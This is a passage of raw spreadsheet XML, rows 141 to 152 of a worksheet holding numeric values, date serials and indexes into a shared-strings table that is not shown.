        <v>17344</v>
      </c>
      <c r="BB141" t="s">
        <v>14811</v>
      </c>
      <c r="BC141" t="s">
        <v>11017</v>
      </c>
      <c r="BD141">
        <v>0</v>
      </c>
    </row>
    <row r="142" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A142">
        <v>259</v>
      </c>
      <c r="B142" t="s">
        <v>1267</v>
      </c>
      <c r="C142" t="s">
        <v>157</v>
      </c>
      <c r="D142" t="s">
        <v>1268</v>
      </c>
      <c r="E142" t="s">
        <v>142</v>
      </c>
      <c r="F142" t="s">
        <v>1269</v>
      </c>
      <c r="G142" s="1">
        <v>43963</v>
      </c>
      <c r="H142">
        <v>3721</v>
      </c>
      <c r="I142">
        <v>3721</v>
      </c>
      <c r="J142">
        <v>4</v>
      </c>
      <c r="K142">
        <v>1</v>
      </c>
      <c r="L142">
        <v>3</v>
      </c>
      <c r="M142">
        <v>0</v>
      </c>
      <c r="N142">
        <v>0</v>
      </c>
      <c r="O142">
        <v>0</v>
      </c>
      <c r="P142">
        <v>0</v>
      </c>
      <c r="Q142">
        <v>0</v>
      </c>
      <c r="R142">
        <v>0</v>
      </c>
      <c r="S142">
        <v>0</v>
      </c>
      <c r="T142">
        <v>0</v>
      </c>
      <c r="U142">
        <v>600000</v>
      </c>
      <c r="V142">
        <v>3000</v>
      </c>
      <c r="W142">
        <v>15000</v>
      </c>
      <c r="X142">
        <v>0</v>
      </c>
      <c r="Y142">
        <v>0</v>
      </c>
      <c r="Z142">
        <v>0</v>
      </c>
      <c r="AA142">
        <v>0</v>
      </c>
      <c r="AB142">
        <v>0</v>
      </c>
      <c r="AC142">
        <v>0</v>
      </c>
      <c r="AD142">
        <v>0</v>
      </c>
      <c r="AE142">
        <v>0</v>
      </c>
      <c r="AF142" t="s">
        <v>1270</v>
      </c>
      <c r="AG142">
        <v>67154</v>
      </c>
      <c r="AH142">
        <v>16</v>
      </c>
      <c r="AJ142">
        <v>241</v>
      </c>
      <c r="AK142" t="s">
        <v>539</v>
      </c>
      <c r="AL142" t="s">
        <v>540</v>
      </c>
      <c r="AM142" t="s">
        <v>1271</v>
      </c>
      <c r="AN142" t="s">
        <v>55</v>
      </c>
      <c r="AO142">
        <v>1998</v>
      </c>
      <c r="AP142">
        <v>343656275</v>
      </c>
      <c r="AQ142" t="s">
        <v>1272</v>
      </c>
      <c r="AR142" t="s">
        <v>1273</v>
      </c>
      <c r="AS142" t="s">
        <v>71</v>
      </c>
      <c r="AT142" t="s">
        <v>58</v>
      </c>
      <c r="AU142">
        <v>25</v>
      </c>
      <c r="AV142">
        <v>1</v>
      </c>
      <c r="AW142">
        <v>11</v>
      </c>
      <c r="AX142">
        <v>33</v>
      </c>
      <c r="AY142">
        <v>40</v>
      </c>
      <c r="AZ142">
        <v>16</v>
      </c>
      <c r="BA142" t="s">
        <v>16651</v>
      </c>
      <c r="BB142" t="s">
        <v>14429</v>
      </c>
      <c r="BC142">
        <v>0</v>
      </c>
      <c r="BD142">
        <v>0</v>
      </c>
    </row>
    <row r="143" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A143">
        <v>645</v>
      </c>
      <c r="B143" t="s">
        <v>1274</v>
      </c>
      <c r="C143" t="s">
        <v>579</v>
      </c>
      <c r="D143" t="s">
        <v>1275</v>
      </c>
      <c r="E143" t="s">
        <v>49</v>
      </c>
      <c r="F143" t="s">
        <v>1276</v>
      </c>
      <c r="G143" s="1">
        <v>43970</v>
      </c>
      <c r="H143">
        <v>3734</v>
      </c>
      <c r="I143">
        <v>3734</v>
      </c>
      <c r="J143">
        <v>0</v>
      </c>
      <c r="K143">
        <v>0</v>
      </c>
      <c r="L143">
        <v>0</v>
      </c>
      <c r="M143">
        <v>0</v>
      </c>
      <c r="N143">
        <v>0</v>
      </c>
      <c r="O143">
        <v>0</v>
      </c>
      <c r="P143">
        <v>0</v>
      </c>
      <c r="Q143">
        <v>1</v>
      </c>
      <c r="R143">
        <v>1</v>
      </c>
      <c r="S143">
        <v>0</v>
      </c>
      <c r="T143">
        <v>2</v>
      </c>
      <c r="U143">
        <v>0</v>
      </c>
      <c r="V143">
        <v>0</v>
      </c>
      <c r="W143">
        <v>0</v>
      </c>
      <c r="X143">
        <v>0</v>
      </c>
      <c r="Y143">
        <v>0</v>
      </c>
      <c r="Z143">
        <v>0</v>
      </c>
      <c r="AA143">
        <v>0</v>
      </c>
      <c r="AB143">
        <v>50</v>
      </c>
      <c r="AC143">
        <v>50</v>
      </c>
      <c r="AD143">
        <v>0</v>
      </c>
      <c r="AE143">
        <v>50</v>
      </c>
      <c r="AF143" t="s">
        <v>1277</v>
      </c>
      <c r="AG143">
        <v>75123</v>
      </c>
      <c r="AH143">
        <v>23</v>
      </c>
      <c r="AJ143">
        <v>364</v>
      </c>
      <c r="AK143" t="s">
        <v>1278</v>
      </c>
      <c r="AL143" t="s">
        <v>1279</v>
      </c>
      <c r="AM143" t="s">
        <v>1280</v>
      </c>
      <c r="AN143" t="s">
        <v>68</v>
      </c>
      <c r="AO143">
        <v>2015</v>
      </c>
      <c r="AP143">
        <v>81258123456</v>
      </c>
      <c r="AQ143" t="s">
        <v>1281</v>
      </c>
      <c r="AR143" t="s">
        <v>1277</v>
      </c>
      <c r="AS143" t="s">
        <v>71</v>
      </c>
      <c r="AT143" t="s">
        <v>72</v>
      </c>
      <c r="AU143">
        <v>16</v>
      </c>
      <c r="AV143">
        <v>1</v>
      </c>
      <c r="AW143">
        <v>0</v>
      </c>
      <c r="AX143">
        <v>0</v>
      </c>
      <c r="AY143">
        <v>6</v>
      </c>
      <c r="AZ143">
        <v>0</v>
      </c>
      <c r="BA143" t="s">
        <v>17363</v>
      </c>
      <c r="BB143" t="s">
        <v>14747</v>
      </c>
      <c r="BC143" t="s">
        <v>10241</v>
      </c>
      <c r="BD143">
        <v>0</v>
      </c>
    </row>
    <row r="144" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A144">
        <v>229</v>
      </c>
      <c r="B144" t="s">
        <v>1282</v>
      </c>
      <c r="C144" t="s">
        <v>157</v>
      </c>
      <c r="D144" t="s">
        <v>1283</v>
      </c>
      <c r="E144" t="s">
        <v>142</v>
      </c>
      <c r="F144" t="s">
        <v>1284</v>
      </c>
      <c r="G144" s="1">
        <v>44039</v>
      </c>
      <c r="H144">
        <v>3754</v>
      </c>
      <c r="I144">
        <v>3754</v>
      </c>
      <c r="J144">
        <v>5</v>
      </c>
      <c r="K144">
        <v>1</v>
      </c>
      <c r="L144">
        <v>0</v>
      </c>
      <c r="M144">
        <v>3</v>
      </c>
      <c r="N144">
        <v>6000</v>
      </c>
      <c r="O144">
        <v>0</v>
      </c>
      <c r="P144">
        <v>0</v>
      </c>
      <c r="Q144">
        <v>11</v>
      </c>
      <c r="R144">
        <v>21</v>
      </c>
      <c r="S144">
        <v>0</v>
      </c>
      <c r="T144">
        <v>3</v>
      </c>
      <c r="U144">
        <v>850000</v>
      </c>
      <c r="V144">
        <v>1000</v>
      </c>
      <c r="W144">
        <v>0</v>
      </c>
      <c r="X144">
        <v>4500</v>
      </c>
      <c r="Y144">
        <v>0</v>
      </c>
      <c r="Z144">
        <v>0</v>
      </c>
      <c r="AA144">
        <v>0</v>
      </c>
      <c r="AB144">
        <v>20000</v>
      </c>
      <c r="AC144">
        <v>60000</v>
      </c>
      <c r="AD144">
        <v>0</v>
      </c>
      <c r="AE144">
        <v>40000</v>
      </c>
      <c r="AF144" t="s">
        <v>1285</v>
      </c>
      <c r="AG144">
        <v>61254</v>
      </c>
      <c r="AH144">
        <v>16</v>
      </c>
      <c r="AJ144">
        <v>242</v>
      </c>
      <c r="AK144" t="s">
        <v>490</v>
      </c>
      <c r="AL144" t="s">
        <v>1286</v>
      </c>
      <c r="AM144" t="s">
        <v>1287</v>
      </c>
      <c r="AN144" t="s">
        <v>82</v>
      </c>
      <c r="AO144">
        <v>1998</v>
      </c>
      <c r="AP144">
        <v>318912251</v>
      </c>
      <c r="AQ144" t="s">
        <v>1288</v>
      </c>
      <c r="AR144" t="s">
        <v>1289</v>
      </c>
      <c r="AS144" t="s">
        <v>71</v>
      </c>
      <c r="AT144" t="s">
        <v>86</v>
      </c>
      <c r="AU144">
        <v>25</v>
      </c>
      <c r="AV144">
        <v>1</v>
      </c>
      <c r="AW144">
        <v>18</v>
      </c>
      <c r="AX144">
        <v>25</v>
      </c>
      <c r="AY144">
        <v>4</v>
      </c>
      <c r="AZ144">
        <v>4</v>
      </c>
      <c r="BA144" t="s">
        <v>16643</v>
      </c>
      <c r="BB144" t="s">
        <v>14403</v>
      </c>
      <c r="BC144">
        <v>0</v>
      </c>
      <c r="BD144" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="145" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A145">
        <v>735</v>
      </c>
      <c r="B145" t="s">
        <v>1290</v>
      </c>
      <c r="C145" t="s">
        <v>47</v>
      </c>
      <c r="D145" t="s">
        <v>1291</v>
      </c>
      <c r="E145" t="s">
        <v>412</v>
      </c>
      <c r="F145" t="s">
        <v>1292</v>
      </c>
      <c r="G145" s="1">
        <v>44071</v>
      </c>
      <c r="H145">
        <v>3760</v>
      </c>
      <c r="I145">
        <v>3760</v>
      </c>
      <c r="J145">
        <v>2</v>
      </c>
      <c r="K145">
        <v>0</v>
      </c>
      <c r="L145">
        <v>0</v>
      </c>
      <c r="M145">
        <v>1</v>
      </c>
      <c r="N145">
        <v>0</v>
      </c>
      <c r="O145">
        <v>0</v>
      </c>
      <c r="P145">
        <v>0</v>
      </c>
      <c r="Q145">
        <v>0</v>
      </c>
      <c r="R145">
        <v>0</v>
      </c>
      <c r="S145">
        <v>0</v>
      </c>
      <c r="T145">
        <v>1</v>
      </c>
      <c r="U145">
        <v>500000</v>
      </c>
      <c r="V145">
        <v>0</v>
      </c>
      <c r="W145">
        <v>0</v>
      </c>
      <c r="X145">
        <v>1500</v>
      </c>
      <c r="Y145">
        <v>0</v>
      </c>
      <c r="Z145">
        <v>0</v>
      </c>
      <c r="AA145">
        <v>0</v>
      </c>
      <c r="AB145">
        <v>0</v>
      </c>
      <c r="AC145">
        <v>0</v>
      </c>
      <c r="AD145">
        <v>0</v>
      </c>
      <c r="AE145">
        <v>1000</v>
      </c>
      <c r="AF145" t="s">
        <v>1293</v>
      </c>
      <c r="AG145">
        <v>21335</v>
      </c>
      <c r="AH145">
        <v>2</v>
      </c>
      <c r="AJ145">
        <v>50</v>
      </c>
      <c r="AK145" t="s">
        <v>443</v>
      </c>
      <c r="AL145" t="s">
        <v>668</v>
      </c>
      <c r="AM145" t="s">
        <v>1294</v>
      </c>
      <c r="AN145" t="s">
        <v>55</v>
      </c>
      <c r="AO145">
        <v>2015</v>
      </c>
      <c r="AP145">
        <v>8116226668</v>
      </c>
      <c r="AQ145" t="s">
        <v>1295</v>
      </c>
      <c r="AR145" t="s">
        <v>1293</v>
      </c>
      <c r="AS145" t="s">
        <v>71</v>
      </c>
      <c r="AT145" t="s">
        <v>58</v>
      </c>
      <c r="AU145">
        <v>365</v>
      </c>
      <c r="AV145">
        <v>1</v>
      </c>
      <c r="AW145">
        <v>8</v>
      </c>
      <c r="AX145">
        <v>2</v>
      </c>
      <c r="AY145">
        <v>0</v>
      </c>
      <c r="AZ145">
        <v>4</v>
      </c>
      <c r="BA145" t="s">
        <v>17365</v>
      </c>
      <c r="BB145" t="s">
        <v>14812</v>
      </c>
      <c r="BC145" t="s">
        <v>11029</v>
      </c>
      <c r="BD145" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="146" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A146">
        <v>667</v>
      </c>
      <c r="B146" t="s">
        <v>1296</v>
      </c>
      <c r="C146" t="s">
        <v>129</v>
      </c>
      <c r="D146" t="s">
        <v>1297</v>
      </c>
      <c r="E146" t="s">
        <v>363</v>
      </c>
      <c r="F146" t="s">
        <v>1298</v>
      </c>
      <c r="G146" s="1">
        <v>44095</v>
      </c>
      <c r="H146">
        <v>3780</v>
      </c>
      <c r="I146">
        <v>3780</v>
      </c>
      <c r="J146">
        <v>0</v>
      </c>
      <c r="K146">
        <v>1</v>
      </c>
      <c r="L146">
        <v>0</v>
      </c>
      <c r="M146">
        <v>0</v>
      </c>
      <c r="N146">
        <v>0</v>
      </c>
      <c r="O146">
        <v>0</v>
      </c>
      <c r="P146">
        <v>0</v>
      </c>
      <c r="Q146">
        <v>3</v>
      </c>
      <c r="R146">
        <v>0</v>
      </c>
      <c r="S146">
        <v>0</v>
      </c>
      <c r="T146">
        <v>1</v>
      </c>
      <c r="U146">
        <v>0</v>
      </c>
      <c r="V146">
        <v>5000</v>
      </c>
      <c r="W146">
        <v>0</v>
      </c>
      <c r="X146">
        <v>0</v>
      </c>
      <c r="Y146">
        <v>0</v>
      </c>
      <c r="Z146">
        <v>0</v>
      </c>
      <c r="AA146">
        <v>0</v>
      </c>
      <c r="AB146">
        <v>3000</v>
      </c>
      <c r="AC146">
        <v>0</v>
      </c>
      <c r="AD146">
        <v>0</v>
      </c>
      <c r="AE146">
        <v>20000</v>
      </c>
      <c r="AF146" t="s">
        <v>1299</v>
      </c>
      <c r="AG146">
        <v>0</v>
      </c>
      <c r="AH146">
        <v>11</v>
      </c>
      <c r="AJ146">
        <v>268</v>
      </c>
      <c r="AK146" t="s">
        <v>252</v>
      </c>
      <c r="AL146" t="s">
        <v>253</v>
      </c>
      <c r="AM146" t="s">
        <v>1300</v>
      </c>
      <c r="AN146" t="s">
        <v>55</v>
      </c>
      <c r="AO146">
        <v>2012</v>
      </c>
      <c r="AP146" t="s">
        <v>1301</v>
      </c>
      <c r="AQ146" t="s">
        <v>1301</v>
      </c>
      <c r="AR146" t="s">
        <v>1299</v>
      </c>
      <c r="AS146" t="s">
        <v>71</v>
      </c>
      <c r="AT146" t="s">
        <v>58</v>
      </c>
      <c r="AU146">
        <v>26</v>
      </c>
      <c r="AV146">
        <v>1</v>
      </c>
      <c r="AW146">
        <v>8</v>
      </c>
      <c r="AX146">
        <v>2</v>
      </c>
      <c r="AY146">
        <v>21</v>
      </c>
      <c r="AZ146">
        <v>7</v>
      </c>
      <c r="BA146">
        <v>0</v>
      </c>
      <c r="BB146" t="s">
        <v>14762</v>
      </c>
      <c r="BC146">
        <v>0</v>
      </c>
      <c r="BD146" t="s">
        <v>11105</v>
      </c>
    </row>
    <row r="147" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A147">
        <v>769</v>
      </c>
      <c r="B147" t="s">
        <v>1302</v>
      </c>
      <c r="C147" t="s">
        <v>157</v>
      </c>
      <c r="D147" t="s">
        <v>1303</v>
      </c>
      <c r="E147" t="s">
        <v>142</v>
      </c>
      <c r="F147" t="s">
        <v>562</v>
      </c>
      <c r="G147" s="1">
        <v>44097</v>
      </c>
      <c r="H147">
        <v>3815</v>
      </c>
      <c r="I147">
        <v>3815</v>
      </c>
      <c r="J147">
        <v>3</v>
      </c>
      <c r="K147">
        <v>0</v>
      </c>
      <c r="L147">
        <v>0</v>
      </c>
      <c r="M147">
        <v>0</v>
      </c>
      <c r="N147">
        <v>0</v>
      </c>
      <c r="O147">
        <v>0</v>
      </c>
      <c r="P147">
        <v>0</v>
      </c>
      <c r="Q147">
        <v>4</v>
      </c>
      <c r="R147">
        <v>500</v>
      </c>
      <c r="S147">
        <v>1</v>
      </c>
      <c r="T147">
        <v>0</v>
      </c>
      <c r="U147">
        <v>100000</v>
      </c>
      <c r="V147">
        <v>0</v>
      </c>
      <c r="W147">
        <v>0</v>
      </c>
      <c r="X147">
        <v>0</v>
      </c>
      <c r="Y147">
        <v>0</v>
      </c>
      <c r="Z147">
        <v>0</v>
      </c>
      <c r="AA147">
        <v>0</v>
      </c>
      <c r="AB147">
        <v>0</v>
      </c>
      <c r="AC147">
        <v>275</v>
      </c>
      <c r="AD147">
        <v>1</v>
      </c>
      <c r="AE147">
        <v>0</v>
      </c>
      <c r="AF147" t="s">
        <v>1304</v>
      </c>
      <c r="AG147">
        <v>68421</v>
      </c>
      <c r="AH147">
        <v>16</v>
      </c>
      <c r="AJ147">
        <v>237</v>
      </c>
      <c r="AK147" t="s">
        <v>311</v>
      </c>
      <c r="AL147" t="s">
        <v>1305</v>
      </c>
      <c r="AM147" t="s">
        <v>1306</v>
      </c>
      <c r="AN147" t="s">
        <v>82</v>
      </c>
      <c r="AO147">
        <v>2015</v>
      </c>
      <c r="AP147" t="s">
        <v>1307</v>
      </c>
      <c r="AQ147" t="s">
        <v>1308</v>
      </c>
      <c r="AR147" t="s">
        <v>1304</v>
      </c>
      <c r="AS147" t="s">
        <v>71</v>
      </c>
      <c r="AT147" t="s">
        <v>86</v>
      </c>
      <c r="AU147">
        <v>26</v>
      </c>
      <c r="AV147">
        <v>1</v>
      </c>
      <c r="AW147">
        <v>147</v>
      </c>
      <c r="AX147">
        <v>336</v>
      </c>
      <c r="AY147">
        <v>47</v>
      </c>
      <c r="AZ147">
        <v>16</v>
      </c>
      <c r="BA147" t="s">
        <v>17369</v>
      </c>
      <c r="BB147" t="s">
        <v>14841</v>
      </c>
      <c r="BC147">
        <v>0</v>
      </c>
      <c r="BD147" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="148" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A148">
        <v>350</v>
      </c>
      <c r="B148" t="s">
        <v>1309</v>
      </c>
      <c r="C148" t="s">
        <v>1310</v>
      </c>
      <c r="D148" t="s">
        <v>1311</v>
      </c>
      <c r="E148" t="s">
        <v>1312</v>
      </c>
      <c r="F148" t="s">
        <v>1313</v>
      </c>
      <c r="G148" s="1">
        <v>44165</v>
      </c>
      <c r="H148">
        <v>3828</v>
      </c>
      <c r="I148">
        <v>3828</v>
      </c>
      <c r="J148">
        <v>1</v>
      </c>
      <c r="K148">
        <v>0</v>
      </c>
      <c r="L148">
        <v>0</v>
      </c>
      <c r="M148">
        <v>0</v>
      </c>
      <c r="N148">
        <v>0</v>
      </c>
      <c r="O148">
        <v>0</v>
      </c>
      <c r="P148">
        <v>0</v>
      </c>
      <c r="Q148">
        <v>2</v>
      </c>
      <c r="R148">
        <v>0</v>
      </c>
      <c r="S148">
        <v>0</v>
      </c>
      <c r="T148">
        <v>1</v>
      </c>
      <c r="U148">
        <v>100</v>
      </c>
      <c r="V148">
        <v>0</v>
      </c>
      <c r="W148">
        <v>0</v>
      </c>
      <c r="X148">
        <v>0</v>
      </c>
      <c r="Y148">
        <v>0</v>
      </c>
      <c r="Z148">
        <v>0</v>
      </c>
      <c r="AA148">
        <v>0</v>
      </c>
      <c r="AB148">
        <v>300</v>
      </c>
      <c r="AC148">
        <v>0</v>
      </c>
      <c r="AD148">
        <v>0</v>
      </c>
      <c r="AE148">
        <v>2000</v>
      </c>
      <c r="AF148" t="s">
        <v>1314</v>
      </c>
      <c r="AG148">
        <v>78244</v>
      </c>
      <c r="AH148">
        <v>20</v>
      </c>
      <c r="AJ148">
        <v>327</v>
      </c>
      <c r="AK148" t="s">
        <v>1315</v>
      </c>
      <c r="AL148" t="s">
        <v>1316</v>
      </c>
      <c r="AM148" t="s">
        <v>1317</v>
      </c>
      <c r="AN148" t="s">
        <v>68</v>
      </c>
      <c r="AO148">
        <v>2015</v>
      </c>
      <c r="AP148" t="s">
        <v>1318</v>
      </c>
      <c r="AQ148" t="s">
        <v>1319</v>
      </c>
      <c r="AR148" t="s">
        <v>1314</v>
      </c>
      <c r="AS148" t="s">
        <v>71</v>
      </c>
      <c r="AT148" t="s">
        <v>72</v>
      </c>
      <c r="AU148">
        <v>25</v>
      </c>
      <c r="AV148">
        <v>1</v>
      </c>
      <c r="AW148">
        <v>0</v>
      </c>
      <c r="AX148">
        <v>0</v>
      </c>
      <c r="AY148">
        <v>4</v>
      </c>
      <c r="AZ148">
        <v>14</v>
      </c>
      <c r="BA148" t="s">
        <v>17368</v>
      </c>
      <c r="BB148" t="s">
        <v>14502</v>
      </c>
      <c r="BC148" t="s">
        <v>12443</v>
      </c>
      <c r="BD148" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="149" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A149">
        <v>227</v>
      </c>
      <c r="B149" t="s">
        <v>671</v>
      </c>
      <c r="C149" t="s">
        <v>157</v>
      </c>
      <c r="D149" t="s">
        <v>1320</v>
      </c>
      <c r="E149" t="s">
        <v>142</v>
      </c>
      <c r="F149" t="s">
        <v>1321</v>
      </c>
      <c r="G149" s="1">
        <v>43971</v>
      </c>
      <c r="H149">
        <v>3836</v>
      </c>
      <c r="I149">
        <v>3836</v>
      </c>
      <c r="J149">
        <v>4</v>
      </c>
      <c r="K149">
        <v>0</v>
      </c>
      <c r="L149">
        <v>0</v>
      </c>
      <c r="M149">
        <v>6</v>
      </c>
      <c r="N149">
        <v>1700</v>
      </c>
      <c r="O149">
        <v>0</v>
      </c>
      <c r="P149">
        <v>0</v>
      </c>
      <c r="Q149">
        <v>5</v>
      </c>
      <c r="R149">
        <v>0</v>
      </c>
      <c r="S149">
        <v>0</v>
      </c>
      <c r="T149">
        <v>1</v>
      </c>
      <c r="U149">
        <v>1800000</v>
      </c>
      <c r="V149">
        <v>0</v>
      </c>
      <c r="W149">
        <v>0</v>
      </c>
      <c r="X149">
        <v>1000</v>
      </c>
      <c r="Y149">
        <v>0</v>
      </c>
      <c r="Z149">
        <v>0</v>
      </c>
      <c r="AA149">
        <v>0</v>
      </c>
      <c r="AB149">
        <v>1000</v>
      </c>
      <c r="AC149">
        <v>0</v>
      </c>
      <c r="AD149">
        <v>0</v>
      </c>
      <c r="AE149">
        <v>1000</v>
      </c>
      <c r="AF149" t="s">
        <v>1322</v>
      </c>
      <c r="AG149">
        <v>61256</v>
      </c>
      <c r="AH149">
        <v>16</v>
      </c>
      <c r="AJ149">
        <v>242</v>
      </c>
      <c r="AK149" t="s">
        <v>758</v>
      </c>
      <c r="AL149" t="s">
        <v>1323</v>
      </c>
      <c r="AM149" t="s">
        <v>1324</v>
      </c>
      <c r="AN149" t="s">
        <v>55</v>
      </c>
      <c r="AO149">
        <v>1983</v>
      </c>
      <c r="AP149">
        <v>318667575</v>
      </c>
      <c r="AQ149" t="s">
        <v>1325</v>
      </c>
      <c r="AR149" t="s">
        <v>1326</v>
      </c>
      <c r="AS149" t="s">
        <v>71</v>
      </c>
      <c r="AT149" t="s">
        <v>58</v>
      </c>
      <c r="AU149">
        <v>26</v>
      </c>
      <c r="AV149">
        <v>1</v>
      </c>
      <c r="AW149">
        <v>0</v>
      </c>
      <c r="AX149">
        <v>60</v>
      </c>
      <c r="AY149">
        <v>259</v>
      </c>
      <c r="AZ149">
        <v>385</v>
      </c>
      <c r="BA149" t="s">
        <v>16854</v>
      </c>
      <c r="BB149" t="s">
        <v>14400</v>
      </c>
      <c r="BC149" t="s">
        <v>11056</v>
      </c>
      <c r="BD149" t="s">
        <v>11057</v>
      </c>
    </row>
    <row r="150" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A150">
        <v>514</v>
      </c>
      <c r="B150" t="s">
        <v>1327</v>
      </c>
      <c r="C150" t="s">
        <v>477</v>
      </c>
      <c r="D150" t="s">
        <v>1328</v>
      </c>
      <c r="E150" t="s">
        <v>142</v>
      </c>
      <c r="F150" t="s">
        <v>666</v>
      </c>
      <c r="G150" s="1">
        <v>43985</v>
      </c>
      <c r="H150">
        <v>3853</v>
      </c>
      <c r="I150">
        <v>3853</v>
      </c>
      <c r="J150">
        <v>3</v>
      </c>
      <c r="K150">
        <v>0</v>
      </c>
      <c r="L150">
        <v>14</v>
      </c>
      <c r="M150">
        <v>0</v>
      </c>
      <c r="N150">
        <v>0</v>
      </c>
      <c r="O150">
        <v>0</v>
      </c>
      <c r="P150">
        <v>0</v>
      </c>
      <c r="Q150">
        <v>0</v>
      </c>
      <c r="R150">
        <v>0</v>
      </c>
      <c r="S150">
        <v>0</v>
      </c>
      <c r="T150">
        <v>1</v>
      </c>
      <c r="U150">
        <v>750000</v>
      </c>
      <c r="V150">
        <v>0</v>
      </c>
      <c r="W150">
        <v>67000</v>
      </c>
      <c r="X150">
        <v>0</v>
      </c>
      <c r="Y150">
        <v>0</v>
      </c>
      <c r="Z150">
        <v>0</v>
      </c>
      <c r="AA150">
        <v>0</v>
      </c>
      <c r="AB150">
        <v>0</v>
      </c>
      <c r="AC150">
        <v>0</v>
      </c>
      <c r="AD150">
        <v>0</v>
      </c>
      <c r="AE150">
        <v>10000</v>
      </c>
      <c r="AF150" t="s">
        <v>1329</v>
      </c>
      <c r="AG150">
        <v>0</v>
      </c>
      <c r="AH150">
        <v>29</v>
      </c>
      <c r="AJ150">
        <v>383</v>
      </c>
      <c r="AK150" t="s">
        <v>1330</v>
      </c>
      <c r="AL150" t="s">
        <v>1331</v>
      </c>
      <c r="AM150" t="s">
        <v>1332</v>
      </c>
      <c r="AN150" t="s">
        <v>55</v>
      </c>
      <c r="AO150">
        <v>2012</v>
      </c>
      <c r="AP150" t="s">
        <v>1333</v>
      </c>
      <c r="AQ150" t="s">
        <v>1334</v>
      </c>
      <c r="AR150" t="s">
        <v>1329</v>
      </c>
      <c r="AS150" t="s">
        <v>71</v>
      </c>
      <c r="AT150" t="s">
        <v>58</v>
      </c>
      <c r="AU150">
        <v>1</v>
      </c>
      <c r="AV150">
        <v>25</v>
      </c>
      <c r="AW150">
        <v>15</v>
      </c>
      <c r="AX150">
        <v>20</v>
      </c>
      <c r="AY150">
        <v>20</v>
      </c>
      <c r="AZ150">
        <v>15</v>
      </c>
      <c r="BA150" t="s">
        <v>17361</v>
      </c>
      <c r="BB150" t="s">
        <v>14634</v>
      </c>
      <c r="BC150" t="s">
        <v>9550</v>
      </c>
      <c r="BD150">
        <v>0</v>
      </c>
    </row>
    <row r="151" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A151">
        <v>507</v>
      </c>
      <c r="B151" t="s">
        <v>1335</v>
      </c>
      <c r="C151" t="s">
        <v>477</v>
      </c>
      <c r="D151" t="s">
        <v>1336</v>
      </c>
      <c r="E151" t="s">
        <v>300</v>
      </c>
      <c r="F151" t="s">
        <v>1337</v>
      </c>
      <c r="G151" s="1">
        <v>43977</v>
      </c>
      <c r="H151">
        <v>3861</v>
      </c>
      <c r="I151">
        <v>3861</v>
      </c>
      <c r="J151">
        <v>4</v>
      </c>
      <c r="K151">
        <v>2</v>
      </c>
      <c r="L151">
        <v>1</v>
      </c>
      <c r="M151">
        <v>0</v>
      </c>
      <c r="N151">
        <v>1200</v>
      </c>
      <c r="O151">
        <v>4</v>
      </c>
      <c r="P151">
        <v>0</v>
      </c>
      <c r="Q151">
        <v>0</v>
      </c>
      <c r="R151">
        <v>0</v>
      </c>
      <c r="S151">
        <v>0</v>
      </c>
      <c r="T151">
        <v>2</v>
      </c>
      <c r="U151">
        <v>700000</v>
      </c>
      <c r="V151">
        <v>20000</v>
      </c>
      <c r="W151">
        <v>10000</v>
      </c>
      <c r="X151">
        <v>0</v>
      </c>
      <c r="Y151">
        <v>0</v>
      </c>
      <c r="Z151">
        <v>15000</v>
      </c>
      <c r="AA151">
        <v>0</v>
      </c>
      <c r="AB151">
        <v>0</v>
      </c>
      <c r="AC151">
        <v>0</v>
      </c>
      <c r="AD151">
        <v>0</v>
      </c>
      <c r="AE151">
        <v>500000</v>
      </c>
      <c r="AF151" t="s">
        <v>1338</v>
      </c>
      <c r="AG151">
        <v>95547</v>
      </c>
      <c r="AH151">
        <v>29</v>
      </c>
      <c r="AJ151">
        <v>383</v>
      </c>
      <c r="AK151" t="s">
        <v>1339</v>
      </c>
      <c r="AL151" t="s">
        <v>1340</v>
      </c>
      <c r="AM151" t="s">
        <v>1341</v>
      </c>
      <c r="AN151" t="s">
        <v>55</v>
      </c>
      <c r="AO151">
        <v>2002</v>
      </c>
      <c r="AP151">
        <v>811434105</v>
      </c>
      <c r="AQ151" t="s">
        <v>1342</v>
      </c>
      <c r="AR151" t="s">
        <v>1343</v>
      </c>
      <c r="AS151" t="s">
        <v>371</v>
      </c>
      <c r="AT151" t="s">
        <v>72</v>
      </c>
      <c r="AU151">
        <v>25</v>
      </c>
      <c r="AV151">
        <v>1</v>
      </c>
      <c r="AW151">
        <v>59</v>
      </c>
      <c r="AX151">
        <v>65</v>
      </c>
      <c r="AY151">
        <v>85</v>
      </c>
      <c r="AZ151">
        <v>204</v>
      </c>
      <c r="BA151" t="s">
        <v>16628</v>
      </c>
      <c r="BB151" t="s">
        <v>14629</v>
      </c>
      <c r="BC151" t="s">
        <v>9550</v>
      </c>
      <c r="BD151" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="152" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A152">
        <v>248</v>
      </c>
      <c r="B152" t="s">
        <v>1344</v>
      </c>
      <c r="C152" t="s">
        <v>157</v>
      </c>
      <c r="D152" t="s">
        <v>1345</v>
      </c>
      <c r="E152" t="s">
        <v>1346</v>
      </c>
      <c r="F152" t="s">
        <v>1347</v>
      </c>
      <c r="G152" s="1">
        <v>43966</v>
      </c>
      <c r="H152">
        <v>3867</v>
      </c>
      <c r="I152">
        <v>3867</v>
      </c>
      <c r="J152">
        <v>0</v>
      </c>
      <c r="K152">
        <v>2</v>
      </c>
      <c r="L152">
        <v>0</v>
      </c>
      <c r="M152">
        <v>0</v>
      </c>
      <c r="N152">
        <v>0</v>
      </c>
      <c r="O152">
        <v>0</v>
      </c>
      <c r="P152">
        <v>7</v>
      </c>
      <c r="Q152">
        <v>2</v>
      </c>
      <c r="R152">
        <v>10</v>
      </c>
      <c r="S152">
        <v>0</v>
      </c>
      <c r="T152">
        <v>1</v>
      </c>
      <c r="U152">
        <v>0</v>
      </c>
      <c r="V152">
        <v>7000</v>
      </c>
      <c r="W152">
        <v>0</v>
      </c>
